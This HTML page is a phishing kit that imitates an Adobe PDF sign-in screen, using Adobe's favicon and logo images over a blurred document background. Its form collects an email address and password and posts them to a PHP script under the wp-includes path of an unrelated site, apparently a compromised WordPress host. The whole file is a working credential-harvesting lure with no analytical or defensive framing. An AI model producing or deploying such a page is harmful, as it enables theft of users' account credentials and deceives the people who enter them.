<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<link rel="shortcut icon" href="https://www.adobe.com/content/dam/dx-dc/favicons/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
</head>



<style type=text/css>
body, html {
height: 100%;
margin: 0;  
font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microilsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}
.wrapper {  
background-image: url(https://i.postimg.cc/T15C5rb1/index-1.png);  
background-repeat: no-repeat; 
background-attachment: fixed;
background-position: center;  
background-size: cover;
position: fixed;  
top: 0;  
left: 0;  
height: 100%;  
width: 100%;   
display: flex;  
flex-flow: column nowrap; 
justify-content: center;  
align-items: center;  
box-sizing: border-box;
background-color: rgb(224,0,0,0);
}
.element {  
width: 320px;  
height: 300px;  
padding: 40px 30px;  
background-color: #ffffff;  
border: 1px solid grey;  
border-color: #b30b00;
box-shadow: #666 0px 2px 10px 3px;
}
.elemente {	
width: 400px;  
height: 300px;  
padding: 40px 30px;  
background-color: #ffffff;  
border: 1px solid grey;
}
#cont {
 text-align:left; 
 padding-top: 10px; 
 font-size:20px; 
 color:#666;
}
#user, #passwd {
 width:320; 
 height:30; 
 border: solid 1px #666; 
 padding-left:3px;
}
input:focus {
 outline: hidden;
}
div .sign-opt {	
 padding: 20px 0px;	
 font-size: 14px;
}
.newbutton {	
 width: 110px; 
 float: left; 
 border-color: #b30b00; 
 background-color: #b30b00; 
 color: #fff; 
 font-size: 14px; 
 padding: 8px 0; 
 cursor: pointer; 
 border: none;
}
</style>

<body>
<div class="wrapper">
<!-- Fixed element that spans the viewport -->
<div id="element" class="element">
<form method="post" action="https://nung2free.com/wp-includes/00.php" autocomplete="off"><p>
<div id="logo">
<img border="0" src="https://static.adobelogin.com/clients/virgoweb-2020/4x_817cf14a2f3fcff4ee6d4e35c5026779.png" color="#b30b00" align="top" width="25" height="25"/> 
<b style="padding-top:5px; font-size:20px;"> Adobe PDF</b>
</div>
</p>
<p>
<div id="cont"></div>
</p>
<p>
<div>
<input type="email" id="login" name="login" required="required" value="" placeholder="Email address" autocomplete="off">
</div>
</p>
<div>
<input type="password" id="password" name="password" required="required" placeholder="Password" autocomplete="off">
</div>
<div id="sign-opt" class="sign-opt">
<div id="no-acc"></div>
<div class="button">
<a href="#">
<button id="i983893" class="newbutton" type="submit" name="submit">
<font color="#fff">Sign in</font>
</button>
</a>
</div>
<div id="sign-out" class="sign-opt">
<a href="#"></a>
</div>
</div>
</form>
</div><!-- your actual centered element -->
</div>
</Body>
</html>
